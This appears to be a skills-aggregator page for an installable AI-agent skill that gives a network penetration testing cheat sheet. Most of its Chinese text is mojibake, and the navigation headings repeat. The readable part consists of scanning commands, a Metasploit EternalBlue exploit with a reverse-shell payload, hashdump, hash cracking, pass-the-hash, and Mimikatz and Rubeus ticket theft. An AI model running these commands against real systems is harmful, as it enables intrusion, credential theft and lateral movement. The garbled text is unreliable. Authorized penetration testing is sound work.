network-penetration-testing

📁 ed1s0nz/cyberstrikeai 📅 9 days ago

总安装量

周安装量

#29147

全站排名

安装命令

npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill network-penetration-testing

Agent 安装分布

opencode 2

codex 2

amp 1

kimi-cli 1

github-copilot 1

claude-code 1

Skill 文档

ç½ç»æ¸éæµè¯

æ¦è¿°

æµè¯èå´

1. ä¿¡æ¯æ¶é

æ£æ¥é¡¹ç®ï¼

ç½ç»ææ
ä¸»æºåç°
ç«¯å£æ«æ
æå¡è¯å«

2. æ¼æ´æ«æ

æ£æ¥é¡¹ç®ï¼

ç³»ç»æ¼æ´
æå¡æ¼æ´
éç½®éè¯¯
å¼±å¯ç

3. æ¼æ´å©ç¨

æ£æ¥é¡¹ç®ï¼

è¿ç¨ä»£ç æ§è¡
æéæå
æ¨ªåç§»å¨
æä¹å

ä¿¡æ¯æ¶é

ç½ç»æ«æ

ä½¿ç¨Nmapï¼

# ä¸»æºåç°
nmap -sn 192.168.1.0/24

# ç«¯å£æ«æ
nmap -sS -p- 192.168.1.100

# æå¡è¯å«
nmap -sV -sC 192.168.1.100

# æä½ç³»ç»è¯å«
nmap -O 192.168.1.100

# å®æ´æ«æ
nmap -sS -sV -sC -O -p- 192.168.1.100

ä½¿ç¨Masscanï¼

# å¿«éç«¯å£æ«æ
masscan -p1-65535 192.168.1.0/24 --rate=1000

æå¡æä¸¾

SMBæä¸¾ï¼

# æä¸¾SMBå±äº«
smbclient -L //192.168.1.100 -N

# æä¸¾SMBç¨æ·
enum4linux -U 192.168.1.100

# ä½¿ç¨nmapèæ¬
nmap --script smb-enum-shares,smb-enum-users 192.168.1.100

RPCæä¸¾ï¼

# æä¸¾RPCæå¡
rpcclient -U "" -N 192.168.1.100

# ä½¿ç¨nmapèæ¬
nmap --script rpc-enum 192.168.1.100

SNMPæä¸¾ï¼

# SNMPæ«æ
snmpwalk -v2c -c public 192.168.1.100

# ä½¿ç¨onesixtyone
onesixtyone -c wordlist.txt 192.168.1.0/24

æ¼æ´æ«æ

ä½¿ç¨Nessus

# å¯å¨Nessus
# è®¿é®Webçé¢
# åå»ºæ«æä»»å¡
# åææ«æç»æ

ä½¿ç¨OpenVAS

# å¯å¨OpenVAS
gvm-setup

# è®¿é®Webçé¢
# åå»ºæ«æä»»å¡
# åææ«æç»æ

ä½¿ç¨Nmapèæ¬

# æ¼æ´æ«æ
nmap --script vuln 192.168.1.100

# ç¹å®æ¼æ´æ«æ
nmap --script smb-vuln-ms17-010 192.168.1.100

# ææèæ¬
nmap --script all 192.168.1.100

æ¼æ´å©ç¨

Metasploit

åºç¡ä½¿ç¨ï¼

# å¯å¨Metasploit
msfconsole

# æç´¢æ¼æ´
search ms17-010

# ä½¿ç¨æ¨¡å
use exploit/windows/smb/ms17_010_eternalblue

# è®¾ç½®åæ°
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

# æ§è¡
exploit

åæ¸éï¼

# è·åç³»ç»ä¿¡æ¯
sysinfo

# è·åæé
getsystem

# è¿ç§»è¿ç¨
migrate <pid>

# è·ååå¸
hashdump

# è·åå¯ç 
run post/windows/gather/smart_hashdump

å¸¸è§æ¼æ´å©ç¨

EternalBlueï¼

# ä½¿ç¨Metasploit
use exploit/windows/smb/ms17_010_eternalblue

# ä½¿ç¨ç¬ç«å·¥å·
python eternalblue.py 192.168.1.100

BlueKeepï¼

# ä½¿ç¨Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

SMBGhostï¼

# ä½¿ç¨ç¬ç«å·¥å·
python smbghost.py 192.168.1.100

æ¨ªåç§»å¨

å¯ç ç ´è§£

ä½¿ç¨Hashcatï¼

# ç ´è§£NTLMåå¸
hashcat -m 1000 hashes.txt wordlist.txt

# ç ´è§£LMåå¸
hashcat -m 3000 hashes.txt wordlist.txt

# ä½¿ç¨è§å
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule

ä½¿ç¨Johnï¼

# ç ´è§£åå¸
john hashes.txt

# ä½¿ç¨åå¸
john --wordlist=wordlist.txt hashes.txt

# ä½¿ç¨è§å
john --wordlist=wordlist.txt --rules hashes.txt

Pass-the-Hash

ä½¿ç¨Impacketï¼

# SMB Pass-the-Hash
python smbexec.py -hashes :<hash> domain/user@target

# WMI Pass-the-Hash
python wmiexec.py -hashes :<hash> domain/user@target

# RDP Pass-the-Hash
xfreerdp /u:user /pth:<hash> /v:target

ç¥¨æ®ä¼ é

ä½¿ç¨Mimikatzï¼

# æåç¥¨æ®
sekurlsa::tickets /export

# æ³¨å¥ç¥¨æ®
kerberos::ptt ticket.kirbi

ä½¿ç¨Rubeusï¼

# è¯·æ±ç¥¨æ®
Rubeus.exe asktgt /user:user /domain:domain /rc4:hash

# æ³¨å¥ç¥¨æ®
Rubeus.exe ptt /ticket:ticket.kirbi

å·¥å·ä½¿ç¨

Nmap

# å®æ´æ«æ
nmap -sS -sV -sC -O -p- -T4 target

# éè½æ«æ
nmap -sS -T2 -f -D RND:10 target

# UDPæ«æ
nmap -sU -p- target

Metasploit

# å¯å¨æ¡æ¶
msfconsole

# æ°æ®åºåå§å
msfdb init

# å¯¼å¥æ«æç»æ
db_import nmap.xml

# æ¥çä¸»æº
hosts

# æ¥çæå¡
services

Burp Suite

ç½ç»æ«æï¼

éç½®ä»£ç
æµè§ç®æ ç½ç»
åææµé
ä¸»å¨æ«æ

æµè¯æ¸å

ä¿¡æ¯æ¶é

ç½ç»ææåç°
ä¸»æºåç°
ç«¯å£æ«æ
æå¡è¯å«
æä½ç³»ç»è¯å«

æ¼æ´æ«æ

ç³»ç»æ¼æ´æ«æ
æå¡æ¼æ´æ«æ
éç½®éè¯¯æ£æ¥
å¼±å¯ç æ£æ¥

æ¼æ´å©ç¨

è¿ç¨ä»£ç æ§è¡
æéæå
æ¨ªåç§»å¨
æä¹å

å¸¸è§å®å¨é®é¢

1. æªæè¡¥ä¸çç³»ç»

é®é¢ï¼

ç³»ç»æªåæ¶æ´æ°
åå¨å·²ç¥æ¼æ´
è¡¥ä¸ç®¡çä¸å½

ä¿®å¤ï¼

åæ¶å®è£è¡¥ä¸
å»ºç«è¡¥ä¸ç®¡çæµç¨
å®æå®å¨æ´æ°

2. å¼±å¯ç

é®é¢ï¼

é»è®¤å¯ç
ç®åå¯ç
å¯ç éç¨

ä¿®å¤ï¼

å®æ½å¼ºå¯ç çç¥
å¯ç¨å¤å ç´ è®¤è¯
å®ææ´æ¢å¯ç

3. å¼æ¾ç«¯å£

é®é¢ï¼

ä¸å¿è¦çç«¯å£å¼æ¾
æå¡æ´é²
é²ç«å¢éç½®éè¯¯

ä¿®å¤ï¼

å³éä¸å¿è¦ç«¯å£
å®æ½é²ç«å¢è§å
ä½¿ç¨VPNè®¿é®

4. éç½®éè¯¯

é®é¢ï¼

é»è®¤éç½®
æéè¿å¤§
æå¡éç½®ä¸å½

ä¿®å¤ï¼

å®å¨éç½®åºçº¿
æå°æéåå
å®æéç½®å®¡æ¥

æä½³å®è·µ

1. ä¿¡æ¯æ¶é

å¨é¢æ«æ
å¤å·¥å·éªè¯
è®°å½åç°
åæç»æ

2. æ¼æ´å©ç¨

æææµè¯
æå°å½±å
è®°å½æä½
åæ¶æ¸ç

3. æ¥åç¼å

è¯¦ç»è®°å½
é£é©è¯çº§
ä¿®å¤å»ºè®®
éªè¯æ¥éª¤

æ³¨æäºé¡¹

ä»å¨ææç¯å¢ä¸è¿è¡æµè¯
é¿åå¯¹çäº§ç³»ç»é æå½±å
éµå®æ³å¾æ³è§
ä¿æ¤æµè¯æ°æ®

GitHub 仓库 ↗ ← 返回陌讯 Skills 聚合平台

network-penetration-testing

Agent 安装分布

Skill 文档

ç½ç»æ¸éæµè¯

æ¦è¿°

æµè¯èå´

1. ä¿¡æ¯æ¶é

2. æ¼æ´æ«æ

3. æ¼æ´å©ç¨

ä¿¡æ¯æ¶é

ç½ç»æ«æ

æå¡æä¸¾

æ¼æ´æ«æ

ä½¿ç¨Nessus

ä½¿ç¨OpenVAS

ä½¿ç¨Nmapèæ¬

æ¼æ´å©ç¨

Metasploit

å¸¸è§æ¼æ´å©ç¨

æ¨ªåç§»å¨

å¯ç ç ´è§£

Pass-the-Hash

ç¥¨æ®ä¼ é

å·¥å ·ä½¿ç¨

Nmap

Metasploit

Burp Suite

æµè¯æ¸ å

ä¿¡æ¯æ¶é

æ¼æ´æ«æ

æ¼æ´å©ç¨

å¸¸è§å®å ¨é®é¢

1. æªæè¡¥ä¸çç³»ç»

2. å¼±å¯ç 

3. å¼æ¾ç«¯å£

4. é ç½®éè¯¯

æä½³å®è·µ

1. ä¿¡æ¯æ¶é

2. æ¼æ´å©ç¨

3. æ¥åç¼å

æ³¨æäºé¡¹

ç½ç»æ¸éæµè¯

æ¦è¿°

æµè¯èå´

1. ä¿¡æ¯æ¶é

2. æ¼æ´æ«æ

3. æ¼æ´å©ç¨

ä¿¡æ¯æ¶é

ç½ç»æ«æ

æå¡æä¸¾

æ¼æ´æ«æ

ä½¿ç¨Nessus

ä½¿ç¨OpenVAS

ä½¿ç¨Nmapèæ¬

æ¼æ´å©ç¨

å¸¸è§æ¼æ´å©ç¨

æ¨ªåç§»å¨

å¯ç ç ´è§£

ç¥¨æ®ä¼ é

å·¥å·ä½¿ç¨

æµè¯æ¸å

ä¿¡æ¯æ¶é

æ¼æ´æ«æ

æ¼æ´å©ç¨

å¸¸è§å®å¨é®é¢

1. æªæè¡¥ä¸çç³»ç»

2. å¼±å¯ç

3. å¼æ¾ç«¯å£

4. éç½®éè¯¯

æä½³å®è·µ

1. ä¿¡æ¯æ¶é

2. æ¼æ´å©ç¨

3. æ¥åç¼å

æ³¨æäºé¡¹